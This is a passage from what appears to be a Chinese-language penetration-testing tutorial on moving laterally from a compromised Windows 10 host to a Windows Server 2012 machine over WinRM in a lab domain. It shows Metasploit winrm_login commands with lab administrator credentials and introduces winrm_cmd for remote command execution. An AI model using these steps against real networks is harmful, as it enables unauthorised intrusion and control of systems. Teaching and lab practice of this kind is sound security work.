image-20210804200655657
假设此时攻击者已经拿下了内网中的主机 Windows 10,需要继续以 Windows 10 为跳板进行横向移动来拿下 Windows Server 2012,假设此时已经获取到了一个域管理员的登录凭据,并且通过端口扫描发现 Windows Server 2012 开启了 WinRM 服务:
image-20210804212802935
下面我们尝试通过 WinRM 获取 Windows Server 2012 的控制权。 使用 Metasploit 内置模块
image-20210804211757503
如上图所示,发现远程主机 Windows Server 2012 开启了 WinRM 服务并且三种类型的身份验证都支持。
•auxiliary/scanner/winrm/winrm_login
模块可以确定我们获得的管理员凭据是否对其他系统有效:
use auxiliary/scanner/winrm/winrm_login
set DOMAIN whoamianony
set USERNAME administrator
set PASSWORD Whoami2021
set rhosts 192.168.93.30
set rport 5985
run
复制代码
image-20210804211908907
如上图所示当前管理员凭据对目标主机 Windows Server 2012 是有效的。确定凭据有效后,我们开始尝试对目标主机 Windows Server 2012 执行命令。
•auxiliary/scanner/winrm/winrm_cmd
该模块可以通过 WinRM 服务对远程主机执行任意命令,该模块需要有管理员权限的凭据。